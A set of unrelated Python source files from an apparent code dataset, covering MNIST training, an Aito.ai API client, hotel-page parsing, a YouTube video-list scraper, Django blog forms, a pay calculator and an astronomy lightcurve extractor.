sess.graph)\n sess.run(tf.compat.v1.global_variables_initializer())\n tf.compat.v1.summary.scalar(\"Train Loss\", model.cost)\n tf.compat.v1.summary.scalar(\"Train Accuracy\", model.accuracy*100)\n summary = tf.compat.v1.summary.merge_all()\n bno = 0\n for epoch in range(EPOCH_SIZE):\n bno = epoch*50\n for i in range(50):\n bno = bno+1\n print('{} loading training data for batch {}...'.format(\n strftime(\"%H:%M:%S\"), bno))\n batch_x, batch_y = mnist.train.next_batch(\n batch_size=BATCH_SIZE)\n batch_x = batch_x.reshape((BATCH_SIZE, MAX_STEP, FEAT_SIZE))\n print('{} training...'.format(strftime(\"%H:%M:%S\")))\n summary_str, _ = sess.run([summary, model.optimize], {\n data: batch_x, target: batch_y, training: True})\n summary_writer.add_summary(summary_str, bno)\n summary_writer.flush()\n # print('{} tagging data as trained, batch no: {}'.format(\n # strftime(\"%H:%M:%S\"), bno))\n # dat.tagDataTrained(uuid, bno)\n print('{} running on test set...'.format(strftime(\"%H:%M:%S\")))\n test_data = mnist.test.images.reshape((-1, MAX_STEP, FEAT_SIZE))\n test_label = mnist.test.labels\n accuracy = sess.run(\n model.accuracy, {data: test_data, target: test_label, training: False})\n print('{} Epoch {:4d} test accuracy {:3.3f}%'.format(\n strftime(\"%H:%M:%S\"), epoch + 1, 100 * accuracy))\n checkpoint_file = os.path.join(LOG_DIR, 'model.ckpt')\n saver.save(sess, checkpoint_file,\n global_step=bno)\n","sub_path":"pstk/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"18017656","text":"import requests\nfrom requests.structures import CaseInsensitiveDict\nimport json\nimport random\n\nurl = 'https://junction2020.aito.app/api/v1'\napi_key = \"0pJDlYxnu29G4fB52vqFe6OW6DfgfOt7a96WkrnM\" # public read API-key\nheaders = CaseInsensitiveDict()\nteams_ids = set()\nheaders[\"x-api-key\"] = api_key\nheaders[\"Content-Type\"] = \"application/json\"\n\n\ndef return_schema(): # for getting a schema of a project\n return requests.get(url+'/schema', headers=headers).json()\n\n\ndef get_item(usr_location: str, props: dict, limit: int, offset: int): # Props are required to be as in an example in Aito.ai API\n data = dict()\n data[\"from\"] = usr_location\n data[\"where\"] = props\n data[\"limit\"] = limit\n data[\"offset\"] = offset\n data = json.dumps(data)\n\n return requests.post(url+'/_search', data=data, headers=headers).json()\n\n\ndef create_an_entry(props: dict, table: str): # props should correspond to their schemas in a database\n return requests.post(url+'/data/{}'.format(table), data=props, headers=headers).json()\n\n\ndef create_an_entry_batch(props: list, table: str): # props is a list of props-dicts(refer to create_an_entry)\n result = list()\n for i in props:\n result.append(requests.post(url+'/data/{}'.format(table), data=i, headers=headers).json())\n return result\n\ndef delete(where_to_delete: str, what_to_delete: dict): # to remove an entry. 
What_to_delete is a dict just like in get_item\n data = dict()\n data[\"from\"] = where_to_delete\n data[\"where\"] = what_to_delete\n data = json.dumps(data)\n return requests.post(url+'/data/_delete', headers=headers, data=data).json()\n\n\ndef recommend(team: list): # team is a list of dicts of users, formed by client\n data = dict()\n data[\"from\"] = \"ratings\"\n if len(team) == 1:\n data[\"where\"] = {\"userID\": team[0]}\n else:\n data[\"where\"] = {\"$and\": list({\"userID\": i} for i in team)}\n data[\"recommend\"] = \"placeID\"\n data[\"goal\"] = {\"rating\": 2}\n data = json.dumps(data)\n return requests.post(url+ '/_recommend', headers=headers, data=data).json()\n\n\ndef create_team(team: list): # list of userid's. Assume that we have a field \"teams\" in user's field\n unique_id = ''\n alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_+'\n for i in range(10):\n unique_id += alphabet[random.randint(0, 64)]\n while unique_id in teams_ids:\n unique_id = ''\n for i in range(10):\n unique_id += alphabet[random.randint(0, 64)]\n teams_ids.add(unique_id)\n for i in team:\n data = dict()\n data[\"from\"] = \"users\"\n data[\"where\"] = {\"userID\": i}\n result = requests.post(url+'/_search', headers=headers, data=data)\n if result.status_code >= 400:\n raise ConnectionError\n else:\n requests.post(url+'/data/_delete', headers=headers, data=data)\n result = result.json()\n result[\"teams\"] += unique_id+';' # teams field -- list of team-ids separated with ;\n result = json.dumps(result)\n create_an_entry(result, 'users')\n\n\ndef delete_team(team_id: str):\n data = dict()\n data[\"from\"] = \"users\"\n data[\"where\"] = {\"teams\": team_id}\n result = get_item('users', data[\"where\"], 100000, 0)\n for i in result:\n teams = result[i][\"teams\"].split(\";\")\n del teams[teams.index(team_id)]\n new = ''\n for j in teams:\n new += j\n new += ';'\n new = new[:-1]\n result[i][\"teams\"] = new\n delete('users', {\"userID\": result[i][\"userID\"]})\n create_an_entry(result[i], 'users')\n\n\n\n# print(recommend([{\n# \"activity\": \"student\",\n# \"ambience\": \"family\",\n# \"birth_year\": 1989,\n# \"budget\": \"medium\",\n# \"color\": \"black\",\n# \"cuisine\": \"American\",\n# \"dress_preference\": \"informal\",\n# \"drink_level\": \"abstemious\",\n# \"height\": 1.77,\n# \"hijos\": \"independent\",\n# \"interest\": \"variety\",\n# \"latitude\": 22.139997,\n# \"longitude\": -100.978803,\n# \"marital_status\": \"single\",\n# \"payment\": \"cash\",\n# \"personality\": \"thrifty-protector\",\n# \"religion\": \"none\",\n# \"smoker\": \"false\",\n# \"transport\": \"on foot\",\n# \"userID\": \"U1001\",\n# \"weight\": 69\n# }, {\n# \"activity\": \"student\",\n# \"ambience\": \"family\",\n# \"birth_year\": 1990,\n# \"budget\": \"low\",\n# \"color\": \"red\",\n# \"cuisine\": \"Mexican\",\n# \"dress_preference\": \"informal\",\n# \"drink_level\": \"abstemious\",\n# \"height\": 1.87,\n# \"hijos\": \"independent\",\n# \"interest\": \"technology\",\n# \"latitude\": 22.150087,\n# \"longitude\": -100.983325,\n# \"marital_status\": \"single\",\n# \"payment\": \"cash\",\n# \"personality\": \"hunter-ostentatious\",\n# \"religion\": \"Catholic\",\n# \"smoker\": \"false\",\n# \"transport\": \"public\",\n# \"userID\": \"U1002\",\n# \"weight\": 40\n# }]))\n# print(create_team(['abacabba']))","sub_path":"api requester.py","file_name":"api requester.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} 
+{"seq_id":"426342257","text":"from hotel import HotelParser\n\nclass ExpediaParser(HotelParser):\n\n\tdef __init__(self, html_file):\n\t\tsuper(ExpediaParser, self).__init__(html_file)\n\t\tself.hotel_name_selector = '.hotelWrapper .segment.hotel .details.showMile .infoCol .hotelName.fakeLink .hotelName strong'\n\t\tself.price_selector = '.hotelWrapper .segment.hotel .details.showMile .priceCol .price'\n\t\tself.city_selector = 'header[id=\"hotelResultTitle\"] .section-header-main'\n\t\tself.date_in_selector = 'input[id=\"inpStartDate\"]'\n\t\tself.date_out_selector = 'input[id=\"inpEndDate\"]'\n\t\tself.hotel_adfilter_selector = '.hotelWrapper .segment.hotel.travelAd .details.showMile .infoCol .hotelName.fakeLink .hotelName strong'\n\t\tself.price_adfilter_selector = '.hotelWrapper .segment.hotel.travelAd .details.showMile .priceCol .price'\n\n\tdef parse_date_in(self):\n\t\tdate_in = self.root.cssselect(self.date_in_selector)\n\t\treturn date_in[0].value\n\n\tdef parse_date_out(self):\n\t\tdate_out = self.root.cssselect(self.date_out_selector)\n\t\treturn date_out[0].value\n\n\tdef parse_date(self):\n\t\ttry:\n\t\t\tdate = self.parse_date_in() + '-' + self.parse_date_out()\n\t\t\tif date == '01/21/2014-01/22/2014':\n\t\t\t\treturn 'A'\n\t\t\telif date == '12/27/2013-01/04/2014':\n\t\t\t\treturn 'B'\n\t\t\telif date == '05/09/2014-05/17/2014':\n\t\t\t\treturn 'C'\n\t\texcept: pass\n\t\treturn 'Z'\n\n\tdef parse_city(self):\n\t\ttry:\n\t\t\tmy_city = self.root.cssselect(self.city_selector)[0].text_content()\n\t\t\tfor city in self.city_list:\n\t\t\t\tif my_city.lower() in city.lower() or city.lower() in my_city.lower():\n\t\t\t\t\treturn city \n\t\texcept: pass\n\t\treturn None\n\n\n\tdef parse_prices(self):\n\t\tacc = []\n\t\tprices = self.root.cssselect(self.price_selector)\n\t\tfiltered = self.root.cssselect(self.price_adfilter_selector)\n\t\tprices = [price for price in prices if price not in filtered]\n\t\tfor price in prices:\n\t\t\tif len(price) == 1:\n\t\t\t\tmy_price = price[0].text_content().strip().replace('$', '').replace(',', '')\n\t\t\telse:\n\t\t\t\tmy_price = price[1].text_content().strip().replace('$', '').replace(',', '')\n\t\t\tacc.append(my_price)\n\t\treturn acc\n\n\tdef parse_hotels(self):\n\t\tacc = []\n\t\thotels = self.root.cssselect(self.hotel_name_selector)\n\t\tfiltered = self.root.cssselect(self.hotel_adfilter_selector)\n\t\thotels = [hotel for hotel in hotels if hotel not in filtered]\n\t\tfor hotel in hotels:\n\t\t\tacc.append(hotel.text_content().strip())\n\t\treturn acc\n","sub_path":"own_parsers/hotel/expedia.py","file_name":"expedia.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"514060036","text":"'''\nCreated by auto_sdk on 2016.04.05\n'''\nfrom tmallsdk.api.base import RestApi\nclass AlitripTicketItemBaseAddRequest(RestApi):\n\tdef __init__(self,domain='gw.api.taobao.com',port=80):\n\t\tRestApi.__init__(self,domain, port)\n\t\tself.buy_limit = None\n\t\tself.eticket_info = None\n\t\tself.item_base_info = None\n\t\tself.item_sale_info = None\n\n\tdef getapiname(self):\n\t\treturn 'taobao.alitrip.ticket.item.base.add'\n","sub_path":"tmallsdk/api/rest/AlitripTicketItemBaseAddRequest.py","file_name":"AlitripTicketItemBaseAddRequest.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"150451393","text":"#-*-coding:utf-8-*-\n# 作者:Li Dong\nimport time\nimport 
json\nfrom urllib import request\nfrom urllib import error\nfrom lxml import etree\n\n\ndef token_next_substracter(url):\n \"\"\"\n Scrape, from a YouTube channel's page, the two url parameters needed to request the json pages listing all videos the channel has published\n @param url: the url of the channel's homepage (with the \"Videos\" tab selected)\n @type url: str\n @return: a tuple of the form (Mytoken, NextContinuationParams)\n @rtype: tuple\n \"\"\"\n global headers\n rqo = request.Request(url, headers=headers)\n while(True):\n try:\n rp = request.urlopen(rqo).read().decode(\"utf-8\")\n break;\n except (error.HTTPError, error.URLError, ConnectionRefusedError):\n pass\n # The info for the first 30 videos sits directly in the static HTML obtained from the request above; strictly speaking the info is in a json, and the json sits inside a javascript block\n # So after pulling the js out with xpath, slice the string to get the json part inside\n html_dom = etree.HTML(rp)\n list_Script = html_dom.xpath(\"body/script/text()\")\n # print(list_Script)\n KeyScript = list_Script[1]\n processed_KeyScript = KeyScript[len(\"\t window[\\\"ytInitialData\\\"] = \"): KeyScript.find(\";\\n\")]\n # Data extraction\n dict_KeyScript = json.loads(processed_KeyScript)\n # Deeply nested json; not sure whether there is an efficient way to find the path to a given item in one step\n gridRenderer = dict_KeyScript[\"contents\"][\"twoColumnBrowseResultsRenderer\"][\"tabs\"][1][\"tabRenderer\"][\"content\"]['sectionListRenderer']['contents'][0]['itemSectionRenderer'][\"contents\"][0]['gridRenderer']\n list_gridVideoRenderer = gridRenderer[\"items\"]\n for item in list_gridVideoRenderer:\n gridVideoRenderer = item[\"gridVideoRenderer\"]\n videoID = gridVideoRenderer[\"videoId\"]\n title = gridVideoRenderer[\"title\"][\"simpleText\"].replace(\",\", \"|\")\n publishedTime = gridVideoRenderer[\"publishedTimeText\"][\"simpleText\"]\n ViewCount = gridVideoRenderer[\"viewCountText\"][\"simpleText\"].replace(\",\", \"\")\n written_content = \",\".join([videoID, title, publishedTime, ViewCount])\n with open(\"D:\\\\xxx.txt\", \"a\", encoding=\"utf-8\") as f:\n f.write(written_content)\n f.write(\"\\n\")\n dict_continuations = gridRenderer[\"continuations\"][0]\n MyToken = dict_continuations[\"nextContinuationData\"][\"continuation\"]\n NextContinuationParams = dict_continuations[\"nextContinuationData\"][\"clickTrackingParams\"]\n return (MyToken, NextContinuationParams)\n\n\ndef youtube_crawler(tuple_info):\n \"\"\"\n Scrape four fields (ID, title, publish time and view count) for every video published by a YouTube channel\n @param tuple_info: a tuple of the form (Mytoken, NextContinuationParams)\n @type tuple_info: tuple\n @return: a tuple of the form (Mytoken, NextContinuationParams)\n @rtype: tuple\n \"\"\"\n global headers\n # If the argument is an empty tuple, return immediately and end the function\n if tuple_info == ():\n return ()\n else:\n # First take the two required url parameters out of the argument\n NextContinuationParams = tuple_info[1]\n MyToken = tuple_info[0]\n # Assemble the URL and send the request\n json_url = \"https://www.youtube.com/browse_ajax?ctoken=\" + MyToken + \"&continuation=\" + MyToken + \"&itct=\" + NextContinuationParams\n rqo_json = request.Request(json_url, headers=headers)\n # Visit the URL and get the json\n while (True):\n try:\n rp_json = request.urlopen(rqo_json).read().decode(\"utf-8\")\n break;\n except (error.HTTPError, error.URLError, ConnectionRefusedError):\n pass\n # Data extraction\n list_rp = json.loads(rp_json)\n dict_params = list_rp[1]\n gridContinuation = dict_params[\"response\"][\"continuationContents\"][\"gridContinuation\"]\n list_gridVideoRenderer = gridContinuation[\"items\"]\n for item in list_gridVideoRenderer:\n gridVideoRenderer = item[\"gridVideoRenderer\"]\n videoID = gridVideoRenderer[\"videoId\"]\n title = gridVideoRenderer[\"title\"][\"simpleText\"].replace(\",\", \"|\")\n publishedTime = gridVideoRenderer[\"publishedTimeText\"][\"simpleText\"]\n ViewCount = gridVideoRenderer[\"viewCountText\"][\"simpleText\"].replace(\",\", \"\")\n written_content = \",\".join([videoID, title, publishedTime, 
ViewCount])\n with open(\"D:\\\\xxx.txt\", \"a\", encoding=\"utf-8\") as f:\n f.write(written_content)\n f.write(\"\\n\")\n # On the last page of videos the returned json has no \"continuations\" key; the last page naturally has no next-page info\n try:\n dict_continuations = gridContinuation[\"continuations\"][0]\n MyToken = dict_continuations[\"nextContinuationData\"][\"continuation\"]\n NextContinuationParams = dict_continuations[\"nextContinuationData\"][\"clickTrackingParams\"]\n return (MyToken, NextContinuationParams)\n except KeyError:\n return ()\n\n\nif __name__ == '__main__':\n start_time = time.time()\n print(\"start time:\", time.ctime())\n url = \"https://www.youtube.com/channel/XXXXXXXXXXXXXXXXXXX/videos\"\n # The other request-header fields can be dropped, but none of these four may be missing\n # Also, this is only the request header used when not logged in; when logged in, the cookie below gets more complex and extra fields are needed\n # Without logging in the request header is a bit simpler, but if a Chinese video has a finished English translation, that English content is served to you by default\n headers = {\n \"User-Agent\": \"XXXXXX\",\n \"X-YouTube-Client-Name\": \"XXX\",\n \"X-YouTube-Client-Version\": \"XXXXX\",\n \"Cookie\": \"XXX\"\n }\n tuple_info = token_next_substracter(url)\n # print(tuple_info)\n tuple_next_info = youtube_crawler(tuple_info)\n # print(tuple_next_info)\n while tuple_next_info != ():\n tuple_next_info = youtube_crawler(tuple_next_info)\n # print(tuple_next_info)\n ending_time = time.time()\n print(\"end time:\", time.ctime())\n print(\"lasting time:\", ending_time - start_time)\n\n\n","sub_path":"src/youtube_video_info_crawler.py","file_name":"youtube_video_info_crawler.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"483606839","text":"# encoding: UTF-8\n\n# Author: Iván Alejandro Dumas Martínez\n# Description: This program reads a worker's regular hours, overtime hours, and hourly pay, and computes the weekly total\n\ndef calcularPagoNormal(pagoHora, hrsNormal): # Function that computes the pay for regular hours worked\n pagoNormal = pagoHora * hrsNormal\n return pagoNormal\n\n\ndef calcularPagoExtra(pagoHora, hrsExtra): # Function that computes the pay for overtime hours worked\n pagoExtra = pagoHora * 1.5 * hrsExtra\n return pagoExtra\n\n\ndef main(): # Main function\n hrsNormal = int(input(\"Teclea las horas normales trabajadas: \"))\n hrsExtra = int(input(\"Teclea las horas extras trabajadas: \"))\n pagoHora = int(input(\"Teclea el pago por hora: $\"))\n pagoNormal = calcularPagoNormal(pagoHora, hrsNormal)\n pagoExtra = calcularPagoExtra(pagoHora, hrsExtra)\n pagoTotal = pagoNormal + pagoExtra\n print (\"\"\"Pago normal: $%.2f\nPago extra: $%.2f\n----------------------\nPago total: $%.2f\"\"\" % (pagoNormal, pagoExtra, pagoTotal))\n\n\n# Call the main function\nmain()\n","sub_path":"pago.py","file_name":"pago.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"414555962","text":"from django import forms\nfrom .models import Article, Commentaire, Projet, CommentaireProjet\nfrom django.utils.text import slugify\nimport itertools\nfrom django.utils.timezone import now\n#from django.utils.formats import localize\n#from tinymce.widgets import TinyMCE\nfrom django_summernote.widgets import SummernoteWidget\n\nclass ArticleForm(forms.ModelForm):\n # contenu = TinyMCE(attrs={'cols': 80, 'rows': 20})\n estPublic = forms.ChoiceField(choices=((1, \"Article public\"), (0, \"Article Permacat\")), label='', required=True, )\n\n class Meta:\n model = Article\n fields = ['categorie', 'titre', 'contenu', 'estPublic', 'estModifiable']\n widgets = {\n 'contenu': 
SummernoteWidget(),\n # 'bar': SummernoteInplaceWidget(),\n }\n\n def save(self, userProfile):\n instance = super(ArticleForm, self).save(commit=False)\n\n max_length = Article._meta.get_field('slug').max_length\n instance.slug = orig = slugify(instance.titre)[:max_length]\n\n for x in itertools.count(1):\n if not Article.objects.filter(slug=instance.slug).exists():\n break\n\n # Truncate the original slug dynamically. Minus 1 for the hyphen.\n instance.slug = \"%s-%d\" % (orig[:max_length - len(str(x)) - 1], x)\n\n instance.auteur = userProfile\n if not userProfile.is_permacat:\n instance.estPublic = True\n\n instance.save()\n\n return instance\n\n\n def __init__(self, request, *args, **kwargs):\n super(ArticleForm, self).__init__(request, *args, **kwargs)\n self.fields['contenu'].strip = False\n\nclass ArticleChangeForm(forms.ModelForm):\n estPublic = forms.ChoiceField(choices=((1, \"Article public\"), (0, \"Article réserve aux adhérents\")), label='', required=True)\n\n class Meta:\n model = Article\n fields = ['categorie', 'titre', 'contenu', 'estPublic', 'estModifiable', 'estArchive']\n widgets = {\n 'contenu': SummernoteWidget(),\n }\n\n\n def __init__(self, *args, **kwargs):\n super(ArticleChangeForm, self).__init__(*args, **kwargs)\n self.fields['contenu'].strip = False\n self.fields[\"estPublic\"].choices=((1, \"Article public\"), (0, \"Article réservé aux adhérents\")) if kwargs['instance'].estPublic else ((0, \"Article réserve aux adhérents\"),(1, \"Article public\"), )\n\n\n\n# def save(self,):\n# instance = super(ArticleChangeForm, self).save(commit=False)\n# instance.date_modification = now\n# # instance.save()\n# return instance\n\nclass CommentForm(forms.ModelForm):\n #commentaire = TinyMCE(attrs={'cols': 1, 'rows': 1, 'height':10 })\n\n class Meta:\n model = Commentaire\n exclude = ['article','auteur_comm']\n #\n widgets = {\n # 'commentaire': SummernoteWidget(),\n 'commentaire': forms.Textarea(attrs={'rows': 1}),\n }\n\n def __init__(self, request, *args, **kwargs):\n super(CommentForm, self).__init__(request, *args, **kwargs)\n self.fields['commentaire'].strip = False\n\nclass ProjetForm(forms.ModelForm):\n #contenu = forms.CharField(widget=forms.Textarea(attrs={'cols': 80, 'rows': 10}))\n #contenu = TinyMCE(attrs={'cols': 80, 'rows': 20})\n estPublic = forms.ChoiceField(choices=((1, \"Projet public\"), (0, \"Projet Permacat\")), label='', required=True)\n\n class Meta:\n model = Projet\n fields = ['categorie', 'coresponsable', 'titre', 'contenu', 'statut', 'estPublic', 'lien_document', 'fichier_projet', 'lien_vote',]\n widgets = {\n 'contenu': SummernoteWidget(),\n }\n\n def __init__(self, request, *args, **kwargs):\n super(ProjetForm, self).__init__(request, *args, **kwargs)\n self.fields['contenu'].strip = False\n\n def save(self, userProfile):\n instance = super(ProjetForm, self).save(commit=False)\n\n max_length = Projet._meta.get_field('slug').max_length\n instance.slug = orig = slugify(instance.titre)[:max_length]\n\n for x in itertools.count(1):\n if not Projet.objects.filter(slug=instance.slug).exists():\n break\n\n # Truncate the original slug dynamically. 
Minus 1 for the hyphen.\n instance.slug = \"%s-%d\" % (orig[:max_length - len(str(x)) - 1], x)\n\n instance.auteur = userProfile\n\n if not userProfile.is_permacat:\n instance.estPublic = True\n\n instance.save()\n\n return instance\n\n\nclass ProjetChangeForm(forms.ModelForm):\n estPublic = forms.ChoiceField(choices=((1, \"Projet public\"), (0, \"Projet réservé aux adhérents\")), label='', required=True)\n\n class Meta:\n model = Projet\n fields = ['categorie', 'coresponsable', 'titre', 'contenu', 'estPublic', 'lien_document','fichier_projet', 'lien_vote', 'estArchive']\n widgets = {\n 'contenu': SummernoteWidget(),\n }\n\n def __init__(self, *args, **kwargs):\n super(ProjetChangeForm, self).__init__(*args, **kwargs)\n self.fields['contenu'].strip = False\n self.fields[\"estPublic\"].choices = ((1, \"Article public\"), (0, \"Article réserve aux adhérents\")) if kwargs[\n 'instance'].estPublic else ((0, \"Projet réservé aux adhérents\"), (1, \"Projet public\"),)\n\n\nclass CommentProjetForm(forms.ModelForm):\n class Meta:\n model = CommentaireProjet\n exclude = ['projet','auteur_comm']\n\n widgets = {\n 'commentaire': forms.Textarea(attrs={'rows': 1}),\n }\n\n def __init__(self, request, *args, **kwargs):\n super(CommentProjetForm, self).__init__(request, *args, **kwargs)\n self.fields['commentaire'].strip = False","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"148097961","text":"# -*- coding:utf-8 -*-\nimport os\n\n__author__ = 'Mily-V'\n\n\nBASE_URL = 'http://ftest.stud.tech-mail.ru'\nPATH = ''\nBLOG = 'Флудилка'\nTITLE = u'ЗаГоЛоВоК'\nSHORT_TEXT = u'Отображается в блогах'\nMAIN_TEXT = u'Отображается внутри топика'\nNAME_USER = u'Господин Манилов'\nREFERENCE = 'https://github.com/'\nFIX_IMAGE = 'http://knigy-dlya-vseh.ru/pictures/chitatel/gogol/manilov_boklevskij2.jpg'\nLOAD_IMAGE = '/../foto.jpg'\nADD_USER = u'Корольков'\nUSER = 'http://ftest.stud.tech-mail.ru/profile/a.korolkov/'\nQUESTION = u'Вопрос'\nANSWER1 = u'Ответ1'\nANSWER2 = u'Ответ2'\nLOGIN = 'ftest15@tech-mail.ru'\nPASSWORD = os.environ['TTHA2PASSWORD']\nLIMIT_TITLE = 251\nLONG_TITLE = '*'*LIMIT_TITLE","sub_path":"pages/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"165922046","text":"#!/usr/bin/python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport glob\nimport astropy.io.fits as fits\nimport os\n\n\"\"\"\nScript to extract a lightcurve from HST/COS corrtag files\nTested on FUV so far, NUV to come.\nRequires astropy, matplotlib, numpy. \nSaves each FP_POS exposure separately, as well as one combined file.\nFor each exposure the counts from the A and B segments, if both present, are combined.\nAirglow from Lyman alpha and ~1300A O I is removed.\nError is photon noise only. \nOptional: Plots combined lightcurve. \n\nUsage: call the function lc_maker()\n\nlc_extractor.lc_maker(star='unknown', file_path=os.getcwd()+'/', save_path=os.getcwd()+'/lightcurves/', bin_time=1., plot=True)\n\nArguments: \n\t- star = string, what you want the combined light curve to be called. \n\tDefault is to use the 'TARGNAME' keyword in the first corrtag file it comes across.\n\t- file_path = string, where your corrtag files are. Default is the current directory.\n\t- save_path = string, where you want the output to be saved. 
\n\tDefault is a new \"lightcurves\" directory in the current directory\n\t- bin_time = float, time in s to bin the lightcurve to. Default is 1.0s.\n\t- qual_check = boolean, masks out flagged pixels. Default is True.\n\t- plot = boolean, makes a plot of the combined lightcurve. Default is True.\n\t\nOutputs: \n\t- Lightcurve of each exposure saved as [exposure rootname]_[bintime]s_lc.dat.\n\t- Combined lightcurve saved as [star]_[bin_time]s_lc_combined.dat.\n\tLightcurves saved as time(s since MJD=0) counts(s-1) error(s-1). \n\n\"\"\"\n\ndef region_mask(x, y, slope, intercept, height):\n\tmask = (y > slope*x+intercept-height/2.) & (y < slope*x+intercept+height/2.)\n\treturn mask \n\t\ndef ensure_dir(d):\n\tif not os.path.exists(d):\n\t\tos.makedirs(d)\n\t\ndef filewriter(time, counts, error, save_path, filename): \n\t# writes lightcurves to dat files\n\tensure_dir(save_path)\n\tfl=open((save_path+filename),'w')\n\tfor t, c, e in zip(time, counts, error):\n\t fl.write('%f %f %f\\n'%(t, c, e))\n\ndef lc_maker(star='unknown', file_path=os.getcwd()+'/', \n save_path=os.getcwd()+'/lightcurves/', bin_time=1., \n qual_check=True, plot=True):\n\n\t#find the corrtag files, and end the script if there aren't any\n\ttag_files = glob.glob(file_path+'*corrtag*')\n\tif len(tag_files) == 0:\n\t\tprint ('There are no corrtag files in file_path :(.')\n\t\tos._exit(1)\n\t\n\t#find all rootnames\n\trootnames = np.array([], dtype=str)\n\tfor tag in tag_files:\n\t\trootnames= np.append(rootnames, fits.open(tag)[0].header['ROOTNAME'])\n\trootnames = np.unique(rootnames)\n\t\n\t#make arrays to store combined lightcurve in\n\tall_time = np.array([], dtype=float)\n\tall_counts = np.array([], dtype=float)\n\tall_error = np.array([], dtype =float)\n\t\n\tfor rootname in rootnames:\n\t\t\n\t\t#checks if both segments are available \n\t\tsegs = ['a', 'b']\n\t\tif (file_path+rootname+'_corrtag_a.fits') not in tag_files:\n\t\t\tsegs = ['b']\n\t\tif (file_path+rootname+'_corrtag_b.fits') not in tag_files:\n\t\t\tsegs = ['a']\n\t\n\t\tfor seg in segs:\n\t\t\ttag_file = rootname+'_corrtag_'+seg+'.fits'\n\t\n\t\t\tseg = seg.upper() #header keywords are uppercase\n\t\t\t\n\t\t\thdul = fits.open(file_path+tag_file)\n\t\t\theader = hdul[1].header\n\t\t\tdata = hdul[1].data\n\t\t\t\n\t\t\t#get target name\n\t\t\tif star == 'unknown':\n\t\t\t\tstar = hdul[0].header['TARGNAME']\n\t\t\t\n\t\t\t#binning to achive bin_time\n\t\t\tbins = int(header['EXPTIME']/bin_time)\n\t\t\t\n\t\t\t#values for extraction regions\n\t\t\tslope = header['SP_SLP_'+seg]\n\t\t\tsp_intercept = header['SP_LOC_'+seg]\n\t\t\tsp_height = float(header['SP_HGT_'+seg])\n\t\t\t\n\t\t\t#background regions\n\t\t\tbk1_intercept = header['B_BKG1_'+seg]\n\t\t\tbk1_height = float(header['B_HGT1_'+seg])\n\t\t\tbk2_intercept = header['B_BKG1_'+seg]\n\t\t\tbk2_height = float(header['B_HGT1_'+seg])\n\t\t\t\n\t\t\t#data \n\t\t\tx = data['XCORR']\n\t\t\ty = data['YCORR']\n\t\t\ttime = data['TIME']\n\t\t\tw = data['WAVELENGTH']\n\t\t\tdq = data['DQ']\n\t\t\t\n\t\t\t#mask out flagged pixels\n\t\t\tif qual_check == True:\n\t\t\t\tx, y, time, w = x[dq==0], y[dq==0], time[dq==0], w[dq==0]\n\t\t\t\n\t\t\t#mask out airglow from lyman alpha and oi\n\t\t\twave_mask = (w < 1214.)|(w > 1217.)&(w < 1301.)|(w > 1307.)\n\t\t\tx, y, time = x[wave_mask], y[wave_mask], time[wave_mask]\n\t\t\t\n\t\t\t#extract lightcurve from spectrum\n\t\t\tsp_mask = region_mask(x, y, slope, sp_intercept, sp_height)\n\t\t\tsp_lc = np.histogram(time[sp_mask], bins)\n\t\t\tt,sp_counts = sp_lc[1][:-1], 
sp_lc[0]\n\t\t\t\n\t\t\t#background\n\t\t\tbk1_mask = region_mask(x, y, slope, bk1_intercept, bk1_height)\n\t\t\tbk1_lc = np.histogram(time[bk1_mask], bins)\n\t\t\tbk2_mask = region_mask(x, y, slope, bk2_intercept, bk2_height)\n\t\t\tbk2_lc = np.histogram(time[bk2_mask], bins)\n\t\t\tbk_counts = (bk1_lc[0]+bk2_lc[0])*(sp_height/(bk1_height+bk2_height)) #sum background counts and normalise to spectrum area\n\t\t\t\n\t\t\t#background subtraction \n\t\t\tcounts_bksub = sp_counts - bk_counts \n\t\t\t\n\t\t\t#combine a and b segments, if both present\n\t\t\tif len(segs) > 1: \n\t\t\t\tif seg == 'A':\n\t\t\t\t\tcounts = counts_bksub\n\t\t\t\telse:\n\t\t\t\t\tcounts += counts_bksub\n\t\t\telse:\n\t\t\t\tcounts = counts_bksub\n\t\t\t\n\t\t\t#calculate photon noise\n\t\t\terror = counts**0.5 \n\t\t\t\n\t\t\t#convert time to absolute time\n\t\t\tt_adg = t + (header['EXPSTART']*86400.)\n\t\t\t\n\t\t\t#convert to counts s-1 \n\t\t\tcounts_sec = counts/bin_time\n\t\t\terror_sec = error/bin_time\n\t\t\t\n\t\tfilewriter(t_adg, counts_sec, error_sec, save_path, rootname+'_'+str(bin_time)+'s_lc.dat')\n\t\t\t\n\t\tall_time = np.concatenate((all_time, t_adg), axis =0)\t\n\t\tall_counts = np.concatenate((all_counts, counts_sec))\n\t\tall_error = np.concatenate((all_error, error_sec))\n\t\n\tfilewriter(all_time, all_counts, all_error, save_path, star+'_'+str(bin_time)+'s_lc_combined.dat') \n\t\t\n\tif plot == True:\n\t\tplot_lc(star, all_time, all_counts, all_error, bin_time)\n\ndef plot_lc(star, time, counts, error, bin_time):\n\tplt.figure(star+'_'+str(bin_time)+'s')\n\tplt.subplots_adjust(top=0.99, right =0.99)\n\tplt.errorbar(time-time[0], counts, yerr = error, ls='none', marker='o')\n\tplt.xlabel('Time (s)', size=20)\n\tplt.ylabel('Counts (s$^{-1}$)', 